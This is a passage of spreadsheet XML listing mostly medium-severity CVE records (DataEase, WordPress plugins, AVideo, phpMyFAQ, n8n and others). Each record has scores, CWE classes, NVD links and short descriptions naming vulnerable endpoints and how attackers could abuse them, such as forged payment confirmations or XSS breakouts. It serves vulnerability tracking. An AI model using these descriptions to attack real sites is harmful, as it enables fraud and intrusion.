t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2144" s="5" t="inlineStr" /><c r="H2144" s="5" t="n"><v>0.002</v></c><c r="I2144" s="5" t="inlineStr" /><c r="J2144" s="5" t="inlineStr" /><c r="K2144" s="5" t="inlineStr" /><c r="L2144" s="5" t="inlineStr" /><c r="M2144" s="5" t="inlineStr" /><c r="N2144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2144" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2144" s="5" t="inlineStr" /><c r="Q2144" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2144" s="5" t="inlineStr"><is><t>DataEase before 2.10.26 contains multiple access control defects in the sharing link module. Tickets are not bound to the target share UUID, so a valid ticket issued for one share can be reused against another (ShareTicketManage.validateTicket / POST /de2api/share/proxyInfo). The POST /de2api/share/validate endpoint issues a LinkToken after password verification without requiring a ticket, bypassing the 'ticket mandatory' policy. Additionally, the ticket create and delete endpoints (POST /de2api/ticket/saveTicket, POST /de2api/ticket/delTicket) lack share-ownership checks, allowing an authenticated user who knows another user's ticket to modify, rebind, or delete it (denial of service), and GET /de2api/share/queryRelationByUserId/{uid} allows authenticated users to enumerate other users' share mappings.</t></is></c><c r="S2144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82879</t></is></c></row><row r="2145"><c r="A2145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2145" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2145" s="5" t="inlineStr"><is><t>CVE-2026-84043</t></is></c><c r="D2145" s="5" t="n"><v>5.3</v></c><c r="E2145" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2145" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2145" s="5" t="inlineStr" /><c r="H2145" s="5" t="n"><v>0.001</v></c><c r="I2145" s="5" t="inlineStr" /><c r="J2145" s="5" t="inlineStr" /><c r="K2145" s="5" t="inlineStr" /><c r="L2145" s="5" t="inlineStr" /><c r="M2145" s="5" t="inlineStr" /><c r="N2145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2145" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2145" s="5" t="inlineStr" /><c r="Q2145" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R2145" s="5" t="inlineStr"><is><t>The ePayco Payment Gateway for WooCommerce WordPress plugin before 8.4.7 does not properly verify the authenticity of payment confirmation requests, allowing unauthenticated attackers to mark orders as paid without a valid gateway signature.</t></is></c><c r="S2145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84043</t></is></c></row><row r="2146"><c r="A2146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2146" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2146" s="5" t="inlineStr"><is><t>CVE-2026-84044</t></is></c><c r="D2146" s="5" t="n"><v>5.3</v></c><c r="E2146" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2146" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2146" s="5" t="inlineStr" /><c r="H2146" s="5" t="n"><v>0.001</v></c><c r="I2146" s="5" t="inlineStr" /><c r="J2146" s="5" t="inlineStr" /><c r="K2146" s="5" t="inlineStr" /><c r="L2146" s="5" t="inlineStr" /><c r="M2146" s="5" t="inlineStr" /><c r="N2146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2146" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2146" s="5" t="inlineStr" /><c r="Q2146" s="5" t="inlineStr" /><c r="R2146" s="5" t="inlineStr"><is><t>The Restaurant Menu and Food Ordering WordPress plugin before 2.4.12 does not verify that a PayPal payment notification genuinely originates from PayPal, allowing unauthenticated attackers to forge a payment notification and mark their own order as paid and completed without making any payment.</t></is></c><c r="S2146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84044</t></is></c></row><row r="2147"><c r="A2147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2147" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2147" s="5" t="inlineStr"><is><t>CVE-2026-84045</t></is></c><c r="D2147" s="5" t="n"><v>5.3</v></c><c r="E2147" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2147" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2147" s="5" t="inlineStr" /><c r="H2147" s="5" t="n"><v>0.002</v></c><c r="I2147" s="5" t="inlineStr" /><c r="J2147" s="5" t="inlineStr" /><c r="K2147" s="5" t="inlineStr" /><c r="L2147" s="5" t="inlineStr" /><c r="M2147" s="5" t="inlineStr" /><c r="N2147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2147" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2147" s="5" t="inlineStr" /><c r="Q2147" s="5" t="inlineStr" /><c r="R2147" s="5" t="inlineStr"><is><t>The E-cab Taxi Booking Manager for Woocommerce WordPress plugin before 2.0.5 does not validate a client-supplied trip distance and base-price value on the server before pricing a booking, allowing unauthenticated attackers to manipulate the order total down to zero and place real taxi-booking orders at an arbitrary price.</t></is></c><c r="S2147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84045</t></is></c></row><row r="2148"><c r="A2148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2148" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2148" s="5" t="inlineStr"><is><t>CVE-2026-84146</t></is></c><c r="D2148" s="5" t="n"><v>5.3</v></c><c r="E2148" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2148" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2148" s="5" t="inlineStr" /><c r="H2148" s="5" t="n"><v>0.002</v></c><c r="I2148" s="5" t="inlineStr" /><c r="J2148" s="5" t="inlineStr" /><c r="K2148" s="5" t="inlineStr" /><c r="L2148" s="5" t="inlineStr" /><c r="M2148" s="5" t="inlineStr" /><c r="N2148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2148" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2148" s="5" t="inlineStr" /><c r="Q2148" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2148" s="5" t="inlineStr"><is><t>The Xpro Addons — 140+ Widgets for Elementor WordPress plugin before 1.7.8 does not perform any capability or post-status check before rendering a WooCommerce product summary from a supplied product identifier, allowing unauthenticated visitors to retrieve the title, price, SKU, description and stock details of products that are not publicly published (draft, pending, private or scheduled status).</t></is></c><c r="S2148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84146</t></is></c></row><row r="2149"><c r="A2149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2149" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2149" s="5" t="inlineStr"><is><t>CVE-2026-84191</t></is></c><c r="D2149" s="5" t="n"><v>5.3</v></c><c r="E2149" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2149" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2149" s="5" t="inlineStr" /><c r="H2149" s="5" t="n"><v>0.002</v></c><c r="I2149" s="5" t="inlineStr" /><c r="J2149" s="5" t="inlineStr" /><c r="K2149" s="5" t="inlineStr" /><c r="L2149" s="5" t="inlineStr" /><c r="M2149" s="5" t="inlineStr" /><c r="N2149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2149" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2149" s="5" t="inlineStr" /><c r="Q2149" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2149" s="5" t="inlineStr"><is><t>LibreNMS before 26.5.0 contains stored cross-site scripting vulnerabilities in VRF display pages where mplsVpnVrfDescription, vrf_name, and mplsVpnVrfRouteDistinguisher fields from SNMP polling are rendered without sanitization. Attackers controlling a monitored network device can inject arbitrary JavaScript through SNMP responses that executes in the browser of any user viewing VRF-related pages.</t></is></c><c r="S2149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84191</t></is></c></row><row r="2150"><c r="A2150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2150" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2150" s="5" t="inlineStr"><is><t>CVE-2026-84207</t></is></c><c r="D2150" s="5" t="n"><v>5.3</v></c><c r="E2150" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2150" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2150" s="5" t="inlineStr" /><c r="H2150" s="5" t="n"><v>0.002</v></c><c r="I2150" s="5" t="inlineStr" /><c r="J2150" s="5" t="inlineStr" /><c r="K2150" s="5" t="inlineStr" /><c r="L2150" s="5" t="inlineStr" /><c r="M2150" s="5" t="inlineStr" /><c r="N2150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2150" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2150" s="5" t="inlineStr" /><c r="Q2150" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2150" s="5" t="inlineStr"><is><t>Heym before 0.0.98 fails to apply SSRF egress guards to WebSocket Send and WebSocket Trigger nodes, allowing authenticated users to connect to internal services. Attackers can craft workflow nodes with arbitrary URLs and headers to reach internal services and read responses from the WebSocket Trigger node.</t></is></c><c r="S2150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84207</t></is></c></row><row r="2151"><c r="A2151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2151" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2151" s="5" t="inlineStr"><is><t>CVE-2026-84936</t></is></c><c r="D2151" s="5" t="n"><v>5.3</v></c><c r="E2151" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2151" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2151" s="5" t="inlineStr" /><c r="H2151" s="5" t="n"><v>0.002</v></c><c r="I2151" s="5" t="inlineStr" /><c r="J2151" s="5" t="inlineStr" /><c r="K2151" s="5" t="inlineStr" /><c r="L2151" s="5" t="inlineStr" /><c r="M2151" s="5" t="inlineStr" /><c r="N2151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2151" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2151" s="5" t="inlineStr" /><c r="Q2151" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R2151" s="5" t="inlineStr"><is><t>The EmbedPress  WordPress plugin before 4.6.4 does not have proper authorization on a public review-loading action, allowing unauthenticated users to force the site to make repeated billable third-party API requests using the site's own configured API key, and to create an unbounded number of attacker-controlled rows in the database.</t></is></c><c r="S2151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84936</t></is></c></row><row r="2152"><c r="A2152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2152" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2152" s="5" t="inlineStr"><is><t>CVE-2026-85038</t></is></c><c r="D2152" s="5" t="n"><v>5.3</v></c><c r="E2152" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2152" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2152" s="5" t="inlineStr" /><c r="H2152" s="5" t="n"><v>0.002</v></c><c r="I2152" s="5" t="inlineStr" /><c r="J2152" s="5" t="inlineStr" /><c r="K2152" s="5" t="inlineStr" /><c r="L2152" s="5" t="inlineStr" /><c r="M2152" s="5" t="inlineStr" /><c r="N2152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2152" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2152" s="5" t="inlineStr" /><c r="Q2152" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2152" s="5" t="inlineStr"><is><t>The B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form &amp; More WordPress plugin before 5.2.40 does not verify that a role selected during registration is one actually offered on the registration form, allowing unauthenticated users to assign themselves to restricted B2B customer groups and to skip the manual account-approval workflow during self-registration.</t></is></c><c r="S2152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85038</t></is></c></row><row r="2153"><c r="A2153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2153" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2153" s="5" t="inlineStr"><is><t>CVE-2026-85157</t></is></c><c r="D2153" s="5" t="n"><v>5.3</v></c><c r="E2153" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2153" s="5" t="inlineStr" /><c r="H2153" s="5" t="n"><v>0.002</v></c><c r="I2153" s="5" t="inlineStr" /><c r="J2153" s="5" t="inlineStr" /><c r="K2153" s="5" t="inlineStr" /><c r="L2153" s="5" t="inlineStr" /><c r="M2153" s="5" t="inlineStr" /><c r="N2153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2153" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2153" s="5" t="inlineStr" /><c r="Q2153" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2153" s="5" t="inlineStr"><is><t>WWBN AVideo contains a broken access control vulnerability in the unauthenticated feed/index.php endpoint that disables per-video visibility checks when a program_id parameter is supplied. Attackers can enumerate playlist identifiers and retrieve unlisted and group-restricted videos by requesting the RSS feed with any visible playlist id, including empty playlists that return the entire site's hidden video catalogue.</t></is></c><c r="S2153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85157</t></is></c></row><row r="2154"><c r="A2154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2154" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2154" s="5" t="inlineStr"><is><t>CVE-2026-85158</t></is></c><c r="D2154" s="5" t="n"><v>5.3</v></c><c r="E2154" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2154" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2154" s="5" t="inlineStr" /><c r="H2154" s="5" t="n"><v>0.002</v></c><c r="I2154" s="5" t="inlineStr" /><c r="J2154" s="5" t="inlineStr" /><c r="K2154" s="5" t="inlineStr" /><c r="L2154" s="5" t="inlineStr" /><c r="M2154" s="5" t="inlineStr" /><c r="N2154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2154" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2154" s="5" t="inlineStr" /><c r="Q2154" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2154" s="5" t="inlineStr"><is><t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in videoEmbeded.php that echoes the link parameter inside an HTML comment with zero escaping. Attackers can close the comment with --&gt; and inject arbitrary JavaScript that executes when victims visit the crafted embed URL.</t></is></c><c r="S2154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85158</t></is></c></row><row r="2155"><c r="A2155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2155" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2155" s="5" t="inlineStr"><is><t>CVE-2026-85159</t></is></c><c r="D2155" s="5" t="n"><v>5.3</v></c><c r="E2155" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2155" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2155" s="5" t="inlineStr" /><c r="H2155" s="5" t="n"><v>0.002</v></c><c r="I2155" s="5" t="inlineStr" /><c r="J2155" s="5" t="inlineStr" /><c r="K2155" s="5" t="inlineStr" /><c r="L2155" s="5" t="inlineStr" /><c r="M2155" s="5" t="inlineStr" /><c r="N2155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2155" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2155" s="5" t="inlineStr" /><c r="Q2155" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2155" s="5" t="inlineStr"><is><t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php where the cancelUri parameter is echoed in an href attribute after isSafeRedirectURL checks protocol only, not HTML characters. Unauthenticated attackers can inject event handlers via relative URLs with embedded quotes to execute arbitrary JavaScript when users interact with the Cancel button.</t></is></c><c r="S2155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85159</t></is></c></row><row r="2156"><c r="A2156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2156" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2156" s="5" t="inlineStr"><is><t>CVE-2026-85161</t></is></c><c r="D2156" s="5" t="n"><v>5.3</v></c><c r="E2156" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2156" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2156" s="5" t="inlineStr" /><c r="H2156" s="5" t="n"><v>0.001</v></c><c r="I2156" s="5" t="inlineStr" /><c r="J2156" s="5" t="inlineStr" /><c r="K2156" s="5" t="inlineStr" /><c r="L2156" s="5" t="inlineStr" /><c r="M2156" s="5" t="inlineStr" /><c r="N2156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2156" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2156" s="5" t="inlineStr" /><c r="Q2156" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2156" s="5" t="inlineStr"><is><t>AVideo through commit c91b5975d contains a cross-site request forgery vulnerability in removePoster.php that lacks forbidIfNotPost or forbidIfInvalidToken checks. Attackers can craft malicious image tags to delete authenticated victims' live poster and thumbnail files via GET requests.</t></is></c><c r="S2156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85161</t></is></c></row><row r="2157"><c r="A2157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2157" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2157" s="5" t="inlineStr"><is><t>CVE-2026-85577</t></is></c><c r="D2157" s="5" t="n"><v>5.3</v></c><c r="E2157" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2157" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2157" s="5" t="inlineStr" /><c r="H2157" s="5" t="n"><v>0.003</v></c><c r="I2157" s="5" t="inlineStr" /><c r="J2157" s="5" t="inlineStr" /><c r="K2157" s="5" t="inlineStr" /><c r="L2157" s="5" t="inlineStr" /><c r="M2157" s="5" t="inlineStr" /><c r="N2157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2157" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2157" s="5" t="inlineStr" /><c r="Q2157" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2157" s="5" t="inlineStr"><is><t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php that allows unauthenticated attackers to inject arbitrary JavaScript by closing the script tag with &lt;/script&gt;. Attackers can craft a malicious URL with an error parameter containing script breakout sequences to execute arbitrary JavaScript in the victim's browser context on the login page.</t></is></c><c r="S2157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85577</t></is></c></row><row r="2158"><c r="A2158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2158" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2158" s="5" t="inlineStr"><is><t>CVE-2026-85579</t></is></c><c r="D2158" s="5" t="n"><v>5.3</v></c><c r="E2158" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2158" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2158" s="5" t="inlineStr" /><c r="H2158" s="5" t="n"><v>0.002</v></c><c r="I2158" s="5" t="inlineStr" /><c r="J2158" s="5" t="inlineStr" /><c r="K2158" s="5" t="inlineStr" /><c r="L2158" s="5" t="inlineStr" /><c r="M2158" s="5" t="inlineStr" /><c r="N2158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2158" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2158" s="5" t="inlineStr" /><c r="Q2158" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2158" s="5" t="inlineStr"><is><t>SiYuan is affected by an information disclosure vulnerability (confirmed in v3.8.1, fixed in v3.8.2) in the reader-accessible POST /api/transactions/undoState endpoint. The endpoint returns the peekMutatedRootIDs list from the global undo-log stack for a caller-supplied root ID without applying publish-access visibility filtering. An authenticated reader who knows the root ID of a visible document can obtain the internal root IDs of other documents (including private or unpublished ones) modified in the same cross-document transaction, disclosing internal identifiers and cross-document relationships. Document body contents are not directly exposed.</t></is></c><c r="S2158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85579</t></is></c></row><row r="2159"><c r="A2159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2159" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2159" s="5" t="inlineStr"><is><t>CVE-2026-85587</t></is></c><c r="D2159" s="5" t="n"><v>5.3</v></c><c r="E2159" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2159" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2159" s="5" t="inlineStr" /><c r="H2159" s="5" t="n"><v>0.003</v></c><c r="I2159" s="5" t="inlineStr" /><c r="J2159" s="5" t="inlineStr" /><c r="K2159" s="5" t="inlineStr" /><c r="L2159" s="5" t="inlineStr" /><c r="M2159" s="5" t="inlineStr" /><c r="N2159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2159" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2159" s="5" t="inlineStr" /><c r="Q2159" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2159" s="5" t="inlineStr"><is><t>phpMyFAQ before 4.1.8 enforces incorrect permission checks on admin content pages, allowing lesser-privileged editors to read draft and inactive content. Attackers with only add permissions can access news edit and FAQ translate endpoints to view unpublished content invisible to the public.</t></is></c><c r="S2159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85587</t></is></c></row><row r="2160"><c r="A2160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2160" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2160" s="5" t="inlineStr"><is><t>CVE-2026-85589</t></is></c><c r="D2160" s="5" t="n"><v>5.3</v></c><c r="E2160" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2160" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2160" s="5" t="inlineStr" /><c r="H2160" s="5" t="n"><v>0.003</v></c><c r="I2160" s="5" t="inlineStr" /><c r="J2160" s="5" t="inlineStr" /><c r="K2160" s="5" t="inlineStr" /><c r="L2160" s="5" t="inlineStr" /><c r="M2160" s="5" t="inlineStr" /><c r="N2160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2160" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2160" s="5" t="inlineStr" /><c r="Q2160" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2160" s="5" t="inlineStr"><is><t>phpMyFAQ before 4.2.0-alpha.2 contains a missing authorization vulnerability in the admin dashboard API endpoints searches and content-health that enforce only authentication without permission checks. Any authenticated user can access these endpoints to read site-wide search statistics and content-health counters regardless of their privilege level.</t></is></c><c r="S2160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85589</t></is></c></row><row r="2161"><c r="A2161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2161" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2161" s="5" t="inlineStr"><is><t>CVE-2026-85611</t></is></c><c r="D2161" s="5" t="n"><v>5.3</v></c><c r="E2161" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2161" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2161" s="5" t="inlineStr" /><c r="H2161" s="5" t="n"><v>0.002</v></c><c r="I2161" s="5" t="inlineStr" /><c r="J2161" s="5" t="inlineStr" /><c r="K2161" s="5" t="inlineStr" /><c r="L2161" s="5" t="inlineStr" /><c r="M2161" s="5" t="inlineStr" /><c r="N2161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2161" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2161" s="5" t="inlineStr" /><c r="Q2161" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2161" s="5" t="inlineStr"><is><t>OpenPanel before 2.3.0 contains a cross-tenant broken object level authorization vulnerability in the report.getLayouts and report.resetLayout tRPC procedures that fail to scope dashboard queries to the caller's project. Authenticated attackers can supply their own projectId with a victim organization's guessable dashboardId to read confidential report definitions or permanently delete dashboard layouts across tenant boundaries.</t></is></c><c r="S2161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85611</t></is></c></row><row r="2162"><c r="A2162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2162" s="5" t="inlineStr"><is><t>CVE-2026-86080</t></is></c><c r="D2162" s="5" t="n"><v>5.3</v></c><c r="E2162" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2162" s="5" t="inlineStr" /><c r="H2162" s="5" t="n"><v>0.002</v></c><c r="I2162" s="5" t="inlineStr" /><c r="J2162" s="5" t="inlineStr" /><c r="K2162" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2162" s="5" t="inlineStr" /><c r="M2162" s="5" t="inlineStr" /><c r="N2162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2162" s="5" t="inlineStr" /><c r="Q2162" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R2162" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the GitHub Trigger generated a webhook secret but discarded it when GitHub returned HTTP 422 and the node reused an existing webhook. Workflow static data then retained webhookId without webhookSecret, and X-Hub-Signature-256 verification accepted deliveries without a stored secret. The affected logic includes packages/nodes-base/nodes/Github/GithubTriggerHelpers.ts and the 422 webhook reuse path. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="S2162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t></is></c></row><row r="2163"><c r="A2163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2163" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2163" s="5" t="inlineStr"><is><t>CVE-2026-86100</t></is></c><c r="D2163" s="5" t="n"><v>5.3</v></c><c r="E2163" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2163" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2163" s="5" t="inlineStr" /><c r="H2163" s="5" t="n"><v>0.002</v></c><c r="I2163" s="5" t="inlineStr" /><c r="J2163" s="5" t="inlineStr" /><c r="K2163" s="5" t="inlineStr" /><c r="L2163" s="5" t="inlineStr" /><c r="M2163" s="5" t="inlineStr" /><c r="N2163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2163" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2163" s="5" t="inlineStr" /><c r="Q2163" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2163" s="5" t="inlineStr"><is><t>Camaleon CMS versions 2.7.5 through 2.9.1 fail to validate redirect targets when fetching remote files in the Upload from URL media feature. Authenticated attackers can supply URLs that pass initial validation but redirect to internal network addresses, allowing server-side request forgery to internal services.</t></is></c><c r="S2163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86100</t></is></c></row><row r="2164"><c r="A2164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2164" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2164" s="5" t="inlineStr"><is><t>CVE-2026-86115</t></is></c><c r="D2164" s="5" t="n"><v>5.3</v></c><c r="E2164" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2164" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2164" s="5" t="inlineStr" /><c r="H2164" s="5" t="n"><v>0.003</v></c><c r="I2164" s="5" t="inlineStr" /><c r="J2164" s="5" t="inlineStr" /><c r="K2164" s="5" t="inlineStr" /><c r="L2164" s="5" t="inlineStr" /><c r="M2164" s="5" t="inlineStr" /><c r="N2164" s="5" 